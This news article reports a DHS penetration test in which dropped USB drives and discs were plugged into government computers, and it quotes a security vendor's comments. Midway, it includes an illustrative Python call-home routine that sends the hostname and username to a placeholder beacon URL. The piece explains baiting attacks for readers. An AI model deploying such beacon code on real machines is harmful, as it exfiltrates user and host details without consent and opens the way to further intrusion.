Penetration testing by the US Department of Homeland Security, which involved dropping USB thumb drives and various data discs around the car parks of government agency buildings, has revealed a not-so-shocking truth: just like most folk, government workers allow curiosity to trump security when faced with the opportunity to have a nosey at something they think they shouldn't be looking at.
Some 60 percent of those who picked up the thumb drives and discs went on to stick them straight into their work computers to see what they contained. The more official and secret a drive or disc looked, the more likely people were to plug it in: of the drives stamped with an official-looking logo, an amazing 90 percent of those picked up ended up being plugged in.
Of course, this will come as absolutely no surprise to anyone who knows anything about both human nature and IT security. Stick baiting, as the process is known amongst the bad guys, is a remarkably simple and effective method of getting malware onto the networks of target businesses. This particular pen test shows that government departments are not immune to the curiosity factor when it comes to targeted attacks. The DHS testers got their percentage numbers because the drives were 'infected' with a basic call-home routine, but this could just as easily have been truly malicious software such as a Trojan. That such high numbers of drives were able to successfully call home after being plugged in suggests that network security at US government agencies is not as good as it could, and indeed should, be.
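For the curious, a call-home routine of the sort described is trivially simple. The sketch below is purely illustrative (the DHS payload was not published): it gathers the minimal "proof of execution" details a pen tester would want and POSTs them to a collection endpoint. The `BEACON_URL` is a hypothetical placeholder, not anything from the actual test.

```python
import getpass
import json
import socket
from urllib import request

# Hypothetical collection endpoint run by the pen-test team (assumption,
# not from the DHS exercise).
BEACON_URL = "https://example.test/beacon"

def build_beacon() -> bytes:
    """Collect the minimal details a call-home routine would report."""
    payload = {
        "hostname": socket.gethostname(),  # which machine ran the payload
        "user": getpass.getuser(),         # which account plugged the drive in
    }
    return json.dumps(payload).encode("utf-8")

def call_home(url: str = BEACON_URL) -> None:
    """POST the beacon home; each hit received is one 'infected' machine."""
    req = request.Request(
        url,
        data=build_beacon(),
        headers={"Content-Type": "application/json"},
    )
    request.urlopen(req, timeout=5)
```

All a harmless test payload does is phone in a hostname and username; swap the beacon for a downloader or remote shell and the same delivery trick becomes a genuine compromise, which is exactly the point the test makes.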
Ray Bryant, CEO at security experts Idappcom, says the pen test just proves that "there is no device known to mankind that prevents people from being idiots" and warns that human error, coupled with network security systems that are not properly configured, can have disastrous consequences. Unsurprisingly (as his company markets such a thing) he recommends adding an automated security audit layer, which won't prevent human error but would flag up where the network is vulnerable due to configuration problems. "To err is human," Bryant concludes, "but to fail to compensate for those errors is an unnecessary risk."